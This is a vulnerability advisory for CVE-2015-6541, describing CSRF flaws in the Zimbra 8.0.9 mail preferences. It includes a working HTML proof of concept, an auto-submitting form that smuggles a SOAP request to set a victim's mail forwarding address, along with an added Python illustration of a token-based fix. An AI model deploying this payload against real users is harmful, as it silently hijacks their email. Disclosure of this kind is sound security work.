
CVE-2015-6541 : Multiple CSRF in Zimbra Mail interface

Multiple CSRF vulnerabilities have been found in the Mail interface of the Zimbra 8.0.9 GA Release, allowing an attacker to change account preferences such as mail forwarding on behalf of a logged-in user.


CSRF

Forms in the preferences section of older Zimbra releases are vulnerable
to CSRF because they carry no CSRF token tying the request to a valid session.
As a consequence, requests can be forged from a third-party page and replayed at will.

Access Vector: remote
Security Risk: low
Vulnerability: CWE-352
CVSS Base score: 5.8

Proof of Concept


<html>
<body>
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171/service/soap/BatchRequest" method="POST">
    <input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="ZimbraWebClient - FF38
(Win)" version="8.0.9_GA_6191"/><session xmlns="" id="19"/><account
xmlns="" by="name">anto@mail.ubuntu.fr</account><format xmlns=""
type="js"/></context></soap:Header><soap:Body><BatchRequest
xmlns="urn:zimbra" onerror="stop"><ModifyPrefsRequest
xmlns="urn:zimbraAccount" requestId="0"><pref xmlns=""
name="zimbraPrefMailForwardingAddress">itworks@ubuntu.fr</pref></ModifyPrefsRequest><a
xmlns="" n'
value='"sn">itworks</a></BatchRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Solution

Sensitive forms should be protected by a CSRF token.
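The following is an added illustration of the fix described here and of the weakness described in the CSRF section above; it is not Zimbra's code and not part of the original advisory. It models a server-side check for a state-changing SOAP endpoint (the BatchRequest/ModifyPrefsRequest shape used by the PoC) with a per-session synchronizer token, and, as defense in depth, rejects the request body types an HTML form is able to produce (an auto-submitted form can only send application/x-www-form-urlencoded, multipart/form-data or text/plain, and cannot add a custom header). The cookie name `SESSION`, the header name `X-CSRF-Token`, the accepted content types and the in-memory session table are assumptions chosen for the example.

```python
import hmac
import secrets
from dataclasses import dataclass

# Constructed in-memory session table standing in for the server's own:
# session id -> per-session CSRF token.
SESSIONS: dict[str, str] = {}

# Hypothetical cookie and header names chosen for this example.
SESSION_COOKIE = "SESSION"
CSRF_HEADER = "X-CSRF-Token"

# Body types the legitimate SOAP client is assumed to send. None of them can be
# produced by a cross-site HTML form, whose enctype is limited to
# application/x-www-form-urlencoded, multipart/form-data and text/plain.
ACCEPTED_CONTENT_TYPES = {"application/soap+xml", "application/json"}


def new_session() -> tuple[str, str]:
    """Create a session and a random CSRF token bound to it. The token is handed
    to the web client (e.g. embedded in the application page), not set as a
    cookie, so a third-party page has no way to read or send it."""
    sid = secrets.token_urlsafe(32)
    token = secrets.token_urlsafe(32)
    SESSIONS[sid] = token
    return sid, token


@dataclass
class Request:
    cookies: dict[str, str]
    headers: dict[str, str]
    body: str


def check_state_changing_request(req: Request) -> tuple[bool, str]:
    """Return (accepted, reason) for a POST that changes account state."""
    sid = req.cookies.get(SESSION_COOKIE)
    if sid is None or sid not in SESSIONS:
        return False, "no valid session"
    # Header names are case-insensitive; normalise before lookup.
    headers = {k.lower(): v for k, v in req.headers.items()}
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype not in ACCEPTED_CONTENT_TYPES:
        return False, f"unexpected content type {ctype!r}"
    supplied = headers.get(CSRF_HEADER.lower())
    if supplied is None:
        return False, "missing CSRF token"
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(supplied.encode(), SESSIONS[sid].encode()):
        return False, "CSRF token mismatch"
    return True, "ok"


def demo() -> dict[str, tuple[bool, str]]:
    """Run three constructed requests through the check."""
    sid, token = new_session()
    pref_change = ('<BatchRequest><ModifyPrefsRequest>'
                   '<pref name="zimbraPrefMailForwardingAddress">...</pref>'
                   '</ModifyPrefsRequest></BatchRequest>')
    # 1. The shape of the advisory's PoC: the browser attaches the victim's
    #    session cookie automatically, but the form arrives as text/plain and
    #    without any token header.
    forged = Request(cookies={SESSION_COOKIE: sid},
                     headers={"Content-Type": "text/plain"},
                     body=pref_change)
    # 2. The same body sent by the real client with the token it was issued.
    legit = Request(cookies={SESSION_COOKIE: sid},
                    headers={"Content-Type": "application/soap+xml; charset=utf-8",
                             CSRF_HEADER: token},
                    body=pref_change)
    # 3. Correct content type but a token that was not issued for this session.
    guessed = Request(cookies={SESSION_COOKIE: sid},
                      headers={"Content-Type": "application/soap+xml",
                               CSRF_HEADER: "0" * len(token)},
                      body=pref_change)
    return {"forged_form_post": check_state_changing_request(forged),
            "legitimate": check_state_changing_request(legit),
            "guessed_token": check_state_changing_request(guessed)}


if __name__ == "__main__":
    for name, (ok, why) in demo().items():
        print(f"{name:18} accepted={ok} ({why})")
```

The token check is the actual fix the advisory calls for; the content-type check alone would also stop the form-based PoC but is only a supporting control, since it depends on what the legitimate client sends and not on a secret the attacker lacks.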

Fixes

Fixed in the 8.5 release: bug 83547 (https://wiki.zimbra.com/wiki/Security/Collab/86#Notes_from_8.5)

Affected versions

  • Zimbra <= 8.0.9 GA Release

Credits

  • Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail
    -dot- fr)
  • Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)